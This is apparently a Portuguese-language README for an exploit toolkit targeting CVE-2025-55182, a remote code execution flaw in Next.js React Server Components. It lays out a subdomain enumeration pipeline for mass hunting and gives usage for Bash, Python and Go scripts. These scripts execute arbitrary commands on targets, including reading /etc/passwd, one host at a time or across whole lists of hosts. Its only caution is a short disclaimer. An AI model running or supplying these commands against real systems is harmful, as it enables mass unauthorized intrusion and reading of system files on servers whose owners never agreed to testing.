
Scanner multilíngue para CVE-2025-55182 RCE em Componentes de Servidor React do Next.js, com modos de varredura único/em massa e fluxo de trabalho integrado de reconhecimento para bug bounty.
Um kit de ferramentas abrangente para detectar e explorar CVE-2025-55182, uma vulnerabilidade crítica de Execução Remota de Código em aplicações Next.js que utilizam React Server Components.
Este repositório apresenta um scanner Bash unificado (modo Único e em Massa), implementações em Python/Go e um fluxo de trabalho de reconhecimento para bug bounty.

Para caça em massa em domínios curinga, use este pipeline para filtrar alvos antes da varredura:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
O script scanner.sh suporta varreduras de alvo único e varredura em massa a partir de uma lista de arquivos.
chmod +x scanner.sh
Melhor para verificar um alvo específico com saída detalhada.
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Escaneia eficientemente uma lista de URLs e salva hosts vulneráveis em um arquivo.
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
Use esta se você encontrar problemas com o escapamento de caracteres especiais no Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Alto desempenho, dependências mínimas.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Esta ferramenta é apenas para fins educacionais e testes de segurança autorizados. O uso não autorizado é estritamente ilegal. O desenvolvedor não assume nenhuma responsabilidade por uso indevido ou danos causados por este programa.
Detalhe CVE da NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Aviso de Segurança React (vulnerabilidade em React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Template Nuclei do ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Description |
|---|
-d, --domain | URL de alvo único |
-l, --list | Arquivo contendo lista de URLs |
-c, --command | Comando a executar (padrão: id) |
-o, --output | Arquivo de saída para hosts vulneráveis (padrão: vulnerable_hosts.txt) |